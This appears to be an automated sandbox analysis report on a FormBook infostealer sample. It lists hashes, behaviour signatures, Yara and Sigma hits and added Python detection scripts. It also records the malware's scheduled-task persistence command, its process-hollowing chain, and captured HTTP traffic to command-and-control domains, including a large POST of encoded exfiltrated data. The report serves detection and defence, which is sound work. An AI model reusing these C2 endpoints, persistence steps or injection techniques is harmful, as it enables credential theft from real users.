Analysis Report vyac9eSGFdsBaas.exe

Overview

General Information

Sample Name: vyac9eSGFdsBaas.exe
Analysis ID: 284767
MD5: 9f17b7998ba35f50527dbd5264c637a4
SHA1: 32c51e444e34a5412d5d9fc51093673ba585de55
SHA256: bffc51435a1d5a46ec9199c40b72ca08f2708d7384ea9c1a625cc737c73b6eb1

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • vyac9eSGFdsBaas.exe (PID: 6604 cmdline: 'C:\Users\user\Desktop\vyac9eSGFdsBaas.exe' MD5: 9F17B7998BA35F50527DBD5264C637A4)
    • schtasks.exe (PID: 6832 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oDcrHUXLZvF' /XML 'C:\Users\user\AppData\Local\Temp\tmp5B2B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vyac9eSGFdsBaas.exe (PID: 5576 cmdline: {path} MD5: 9F17B7998BA35F50527DBD5264C637A4)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 7000 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
(In a dump name the first field is the process number, the fourth the base address and the fifth the page protection: 0x04 is read-write, 0x40 execute-read-write. Process 00000000 is the submitted sample, where the payload sits in a read-write region at 0x3F08000; process 00000004 is the vyac9eSGFdsBaas.exe instance whose unpacked PE is listed below, with the payload in execute-read-write memory at 0x1150000; process 0000000C, seen under Signature Overview, is NETSTAT.EXE.)
00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x92508:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x92772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x141148:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x1413b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9e295:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14ced5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x9dd81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14c9c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x9e397:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14cfd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x9e50f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x14d14f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x9318a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x141dca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x9cffc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x14bc3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x93e83:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x142ac3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xa3e77:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x152ab7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xa4e8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(17 further memory-dump matches are not shown on this page.)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18339:$sqlite3step: 68 34 1C 7B E1
        • 0x1844c:$sqlite3step: 68 34 1C 7B E1
        • 0x18368:$sqlite3text: 68 38 2A 90 C5
        • 0x1848d:$sqlite3text: 68 38 2A 90 C5
        • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
4.2.vyac9eSGFdsBaas.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vyac9eSGFdsBaas.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE match is not shown on this page.)
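The Yara hits above are byte-level, so it is worth seeing what they actually encode. The following added Python (not Joe Sandbox code and not the rules' own source) takes the three JPCERT/CC strings and yara-signator's $sequence_0 exactly as printed in the tables, decodes the 'push imm32' immediates behind the $sqlite3* strings (the rule keys on those constants, so the match does not depend on sqlite3 function names appearing as text), and checks that every $sequence_0 hit contains the rdtsc instruction, i.e. a timing check of the kind the signature list reports as "Tries to detect virtualization through RDTSC time measurements". The buffer it scans is constructed here, so the offsets are not the report's.

```python
"""What the Yara hits above are keying on.

Added example; it is neither report code nor the rules' own source. The byte
patterns are copied from the rule hits on this page. The buffer they are
searched in is constructed here (the memory dump itself is not reproduced),
so offsets differ from the report's."""
import struct

# JPCERT/CC 'Formbook' strings: each is an x86 'push imm32' (opcode 0x68).
JPCERT_STRINGS = {
    "$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}
# yara-signator 'Formbook_1' $sequence_0:
#   03 C8     add ecx, eax
#   0F 31     rdtsc
#   2B C1     sub eax, ecx
#   89 45 FC  mov [ebp-4], eax
SEQUENCE_0 = bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC")
RDTSC = bytes.fromhex("0F 31")


def push_imm32(pattern: bytes) -> int:
    """Return the immediate of a 5-byte 'push imm32' pattern (little-endian)."""
    if len(pattern) != 5 or pattern[0] != 0x68:
        raise ValueError("not a push imm32")
    return struct.unpack("<I", pattern[1:])[0]


def find_all(buf: bytes, needle: bytes):
    """All offsets of needle in buf, like a Yara string's match list."""
    hits, i = [], buf.find(needle)
    while i != -1:
        hits.append(i)
        i = buf.find(needle, i + 1)
    return hits


def scan(buf: bytes) -> dict:
    """Report where each pattern occurs, the constants the push patterns carry,
    and whether every $sequence_0 hit really contains the rdtsc instruction."""
    seq0 = find_all(buf, SEQUENCE_0)
    return {
        "jpcert": {name: find_all(buf, pat) for name, pat in JPCERT_STRINGS.items()},
        "push_constants": {name: f"0x{push_imm32(pat):08X}" for name, pat in JPCERT_STRINGS.items()},
        "all_jpcert_present": all(find_all(buf, pat) for pat in JPCERT_STRINGS.values()),
        "sequence_0": seq0,
        "rdtsc_inside_sequence_0": bool(seq0) and all(buf[o + 2:o + 4] == RDTSC for o in seq0),
    }


def build_sample() -> bytes:
    """Constructed buffer: filler with the patterns planted at known offsets
    (0x100 and 0x1F8 for $sequence_0; 0x149, 0x15E, 0x173 for the push patterns)."""
    filler = bytes(range(256))  # contains no 0F 31 pair and none of the patterns
    return (filler + SEQUENCE_0 + filler[:0x40]
            + JPCERT_STRINGS["$sqlite3step"] + filler[:0x10]
            + JPCERT_STRINGS["$sqlite3text"] + filler[:0x10]
            + JPCERT_STRINGS["$sqlite3blob"] + filler[:0x80] + SEQUENCE_0)


if __name__ == "__main__":
    for key, value in scan(build_sample()).items():
        print(f"{key}: {value}")
```

Run against a real dump (for example the bytes of 4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack) the offsets should line up with the table above; the three push constants are the values to pivot on when writing your own rule, since they survive the string obfuscation the signature list reports.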

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started
Author: Joe Security
Data:
  Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oDcrHUXLZvF' /XML 'C:\Users\user\AppData\Local\Temp\tmp5B2B.tmp'
  CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oDcrHUXLZvF' /XML 'C:\Users\user\AppData\Local\Temp\tmp5B2B.tmp'
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: 'C:\Users\user\Desktop\vyac9eSGFdsBaas.exe'
  ParentImage: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe
  ParentProcessId: 6604
  ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oDcrHUXLZvF' /XML 'C:\Users\user\AppData\Local\Temp\tmp5B2B.tmp'
  ProcessId: 6832
Note that the command line names System32\schtasks.exe while Image and NewProcessName are SysWOW64\schtasks.exe: the parent is a 32-bit process and WoW64 file-system redirection resolves the path. A rule that anchors on the System32 image path misses this case; match on the file name and on an /XML argument that points into a temp directory. The task name Updates\oDcrHUXLZvF matches the dropped file C:\Users\user\AppData\Roaming\oDcrHUXLZvF.exe listed under AV Detection; the task XML itself is not reproduced in the report.
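The Startup tree and the Sigma hit describe three process-creation patterns worth alerting on: schtasks /Create fed an XML from a temp directory, a user-path binary re-launching its own image (the hollowing step, PID 6604 to 5576), and explorer.exe starting a SysWOW64 utility with no arguments (where the payload ends up, NETSTAT.EXE). The following added Python is not Joe Sandbox code and not the Sigma rule itself; it applies those three checks to events constructed from this page's process tree (the parent of PID 6604 is not in the report and is left empty) plus one constructed benign control, and matches on file names rather than the System32 path for the reason given above.

```python
"""Process-creation triage for the behaviour in the Startup tree and Sigma hit above.

Added example, not Joe Sandbox code and not the Sigma rule itself. Events are
constructed from the process tree on this page; field names follow the Sysmon
Event ID 1 / Windows 4688 style used in the Sigma data (Image, CommandLine,
ParentImage). Matching is done on the file name, not the directory, because
the report shows the command line naming System32\\schtasks.exe while the
Image is SysWOW64\\schtasks.exe (WoW64 redirection for a 32-bit parent)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


# Constructed from the Startup tree above. The parent of PID 6604 is not shown
# in the report, so it is left empty; '{path}' is the placeholder the report prints.
EVENTS = [
    ProcEvent(6604, r"C:\Users\user\Desktop\vyac9eSGFdsBaas.exe",
              r"'C:\Users\user\Desktop\vyac9eSGFdsBaas.exe'", 0, ""),
    ProcEvent(6832, r"C:\Windows\SysWOW64\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oDcrHUXLZvF' "
              r"/XML 'C:\Users\user\AppData\Local\Temp\tmp5B2B.tmp'",
              6604, r"C:\Users\user\Desktop\vyac9eSGFdsBaas.exe"),
    ProcEvent(5576, r"C:\Users\user\Desktop\vyac9eSGFdsBaas.exe", "{path}",
              6604, r"C:\Users\user\Desktop\vyac9eSGFdsBaas.exe"),
    ProcEvent(7000, r"C:\Windows\SysWOW64\NETSTAT.EXE", r"C:\Windows\SysWOW64\NETSTAT.EXE",
              3508, r"C:\Windows\explorer.exe"),
    # Benign control (constructed): task created from a non-temp XML by an admin shell.
    ProcEvent(9001, r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /Create /TN Backup /XML C:\ProgramData\backup.xml",
              9000, r"C:\Windows\System32\cmd.exe"),
]

TEMP_DIR_RE = re.compile(r"\\(?:appdata\\local\\temp|windows\\temp|temp)\\", re.I)
XML_ARG_RE = re.compile(r"/xml\s+['\"]?([^'\"\s]+)", re.I)


def rule_schtasks_temp_xml(e: ProcEvent):
    """Sigma 'Scheduled temp file as task from temp location': schtasks /Create
    whose /XML task definition sits in a temp directory."""
    if not e.image.lower().endswith("\\schtasks.exe") or "/create" not in e.cmdline.lower():
        return None
    m = XML_ARG_RE.search(e.cmdline)
    if m and TEMP_DIR_RE.search(m.group(1)):
        return f"schtasks task created from temp XML {m.group(1)}"
    return None


def rule_self_respawn(e: ProcEvent):
    """A binary outside C:\\Windows launching a second copy of itself: the
    pattern the report labels process hollowing (PID 6604 -> 5576)."""
    img = e.image.lower()
    if img and img == e.parent_image.lower() and not img.startswith("c:\\windows\\"):
        return "process re-launched its own image (hollowing candidate)"
    return None


def rule_explorer_spawns_wow64_tool(e: ProcEvent):
    """explorer.exe starting a 32-bit system utility with no arguments, which is
    where the injected payload ends up here (explorer.exe -> NETSTAT.EXE).
    Tune to your estate; this is an illustration, not a production rule."""
    if e.parent_image.lower().endswith("\\explorer.exe") and "\\syswow64\\" in e.image.lower():
        if len(e.cmdline.split()) == 1:
            return "explorer.exe spawned a SysWOW64 utility with no arguments"
    return None


RULES = (rule_schtasks_temp_xml, rule_self_respawn, rule_explorer_spawns_wow64_tool)


def triage(events):
    """Return (pid, finding) pairs in event order; each rule fires at most once per event."""
    findings = []
    for e in events:
        for rule in RULES:
            hit = rule(e)
            if hit:
                findings.append((e.pid, hit))
    return findings


if __name__ == "__main__":
    for pid, finding in triage(EVENTS):
        print(f"PID {pid}: {finding}")
```

On this input the three malicious events fire one rule each and the benign control fires none; on real telemetry the third rule needs an allow-list, since legitimate explorer.exe children with empty command lines do exist.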

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://www.camdio.xyz/k8b/ | Virustotal: Detection: 6%
(This is the same /k8b/ path on a fourth domain that does not appear in the captured traffic below.)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\oDcrHUXLZvF.exe | Virustotal: Detection: 21%
Multi AV Scanner detection for submitted file
Source: vyac9eSGFdsBaas.exe | Virustotal: Detection: 21%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.632020204.00000000036A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.631947208.0000000003660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.631039100.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.433229610.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.432161870.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\oDcrHUXLZvF.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: vyac9eSGFdsBaas.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe | Code function: 4x nop then pop edi | 4_2_00416BF6
Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe | Code function: 4x nop then pop edi | 4_2_0040E38C
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi | 12_2_02F7E38C
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi | 12_2_02F86C45
(The last two signature headings were lost in extraction and are restored from the signature list above. Code function 4_2_0040E38C in process 4, whose image base is 0x400000, and 12_2_02F7E38C in NETSTAT.EXE share the RVA 0xE38C; together with the Yara hit on the execute-read-write dump 0000000C…0000000002F70000 listed above, this shows the same unpacked payload mapped into NETSTAT.EXE at base 0x02F70000.)

          Networking:

          barindex
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=l8hWUFLJuml4eYku4/VYU6RSnNDRvqfvURXgu3llAvj/NGacI/RacADph16unSeN08+r&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.cloutmonk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=VC7ph94nBwHqpUSYspNTCN309MDkymEOcmQ6ikEgb4YKagxI1RKoe1AlMLDdw+SPwNPO&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.nastykiki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=/9OlxiJfDFCR+kV/3jQOp8a9FKVAShy06VW92GW7Kq51jBaeGYNY0G4LSnjLLhaFT7RV&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.coin-1234.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.cloutmonk.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cloutmonk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cloutmonk.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 74 65 74 73 4b 6c 76 44 6c 6e 68 34 4d 71 6c 63 6f 36 67 43 44 63 31 4f 78 65 62 46 6f 70 58 39 4b 46 47 5f 33 51 31 70 51 66 4f 39 4a 6b 4f 57 46 66 67 70 56 31 76 74 30 6e 4f 73 37 6d 32 49 79 65 65 6c 54 54 53 56 4b 6e 42 6a 6f 66 36 6e 4e 36 58 68 76 52 47 59 6d 6b 28 6b 51 68 4c 45 33 73 79 46 67 59 74 47 62 79 4a 4d 59 44 36 70 62 75 49 35 39 42 52 64 66 79 41 50 47 74 6f 4b 4d 5a 45 63 28 74 7e 62 77 48 68 51 45 59 62 58 48 78 35 6a 6b 53 74 7a 69 30 6e 36 32 77 50 75 69 73 6a 34 66 66 47 4e 59 66 47 72 45 62 73 51 54 53 30 6d 63 74 30 61 6c 36 72 79 68 6c 28 65 57 6f 30 6a 62 6d 50 70 54 49 33 32 75 55 6f 53 7a 73 5a 41 4f 72 79 62 36 51 39 73 47 6e 77 2d 39 32 74 77 58 46 37 79 75 7a 4b 6c 57 72 78 34 56 67 67 38 52 6c 57 73 6c 63 6e 76 38 42 6a 5f 61 63 66 7a 6d 69 45 67 6c 67 67 77 34 75 46 44 62 64 36 52 56 51 74 4a 54 69 50 62 4c 70 66 6a 6a 52 72 74 61 42 54 6f 6c 71 69 47 6f 53 67 78 6e 79 74 76 5a 32 58 45 62 79 68 32 42 6f 79 71 6b 70 7e 59 63 61 65 50 68 6f 43 31 45 77 6c 49 75 63 56 6b 33 79 58 4f 73 51 51 34 43 6c 6b 47 50 30 59 67 7e 50 4b 4e 62 45 78 43 65 4a 33 79 34 50 77 56 79 72 53 31 56 70 31 68 4f 4f 67 45 38 35 77 30 76 55 69 35 39 50 54 38 61 54 69 74 77 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
GZFPC=tetsKlvDlnh4Mqlco6gCDc1OxebFopX9KFG_3Q1pQfO9JkOWFfgpV1vt0nOs7m2IyeelTTSVKnBjof6nN6XhvRGYmk(kQhLE3syFgYtGbyJMYD6pbuI59BRdfyAPGtoKMZEc(t~bwHhQEYbXHx5jkStzi0n62wPuisj4ffGNYfGrEbsQTS0mct0al6ryhl(eWo0jbmPpTI32uUoSzsZAOryb6Q9sGnw-92twXF7yuzKlWrx4Vgg8RlWslcnv8Bj_acfzmiEglggw4uFDbd6RVQtJTiPbLpfjjRrtaBTolqiGoSgxnytvZ2XEbyh2Boyqkp~YcaePhoC1EwlIucVk3yXOsQQ4ClkGP0Yg~PKNbExCeJ3y4PwVyrS1Vp1hOOgE85w0vUi59PT8aTitwQ).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.cloutmonk.comConnection: closeContent-Length: 186031Cache-Control: no-cacheOrigin: http://www.cloutmonk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cloutmonk.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 74 65 74 73 4b 67 53 79 6b 58 6c 70 49 65 52 64 70 71 77 61 56 76 74 63 6e 73 75 42 71 2d 62 70 48 33 7a 6b 33 51 6c 74 49 75 66 67 44 6e 57 57 4d 39 49 69 57 6c 76 73 79 6e 4f 76 71 32 79 5a 37 70 69 2d 54 53 6e 36 4b 6e 35 6b 6a 38 79 69 4e 71 58 74 75 78 43 6b 33 45 61 32 51 6a 76 62 33 4f 65 6a 73 34 68 47 65 43 52 4f 61 69 4b 4d 63 73 39 6f 30 56 77 58 4d 6e 30 4b 47 64 45 79 4e 37 34 75 75 73 69 5a 68 6c 39 5a 42 59 71 2d 4e 47 74 73 71 69 35 30 37 46 7a 74 31 54 72 71 6e 74 69 50 55 39 7e 4f 55 4d 32 62 42 63 41 6d 58 6e 51 78 50 4e 6c 70 6c 35 37 4d 74 7a 28 44 64 50 56 73 65 55 71 4f 59 64 50 30 68 48 52 4e 6b 2d 67 77 64 36 43 30 79 79 6c 6e 44 32 63 4f 7e 7a 68 67 64 45 69 4f 6f 42 75 66 5a 2d 31 51 57 7a 73 30 54 6d 4f 54 28 50 47 74 7a 41 44 6e 4b 4f 7a 56 70 69 46 32 6a 67 67 6b 79 39 4e 53 65 6f 65 57 47 77 38 71 53 6c 37 48 4f 35 7a 69 6d 55 76 68 55 45 33 31 32 75 75 30 78 79 51 4a 6a 53 59 74 5a 6c 6e 76 49 53 67 33 59 61 4c 6f 6b 70 28 68 63 62 66 6b 69 36 7e 31 47 67 45 55 36 64 56 6f 78 79 57 53 71 41 41 36 5a 46 5a 4e 50 30 41 67 38 37 44 6f 56 58 42 43 61 61 28 31 28 73 6f 56 78 62 53 31 5a 4a 30 46 44 39 56 4e 39 72 39 41 72 32 69 79 37 70 69 64 57 48 69 6a 7a 61 73 6d 57 56 67 75 72 74 45 73 54 45 4b 4d 71 58 65 53 7e 30 67 64 55 43 67 58 68 75 6f 75 48 66 48 48 70 4a 46 32 79 36 6b 54 64 6f 47 78 50 59 38 33 7e 75 59 5f 6c 69 45 48 72 65 45 34 6e 4a 76 4b 44 57 6f 67 41 4f 49 4e 46 48 31 41 44 62 69 75 63 55 75 73 7a 4b 7e 30 5a 38 61 2d 72 4c 76 68 51 70 6c 63 4f 6e 6b 5f 46 57 75 58 34 61 6e 
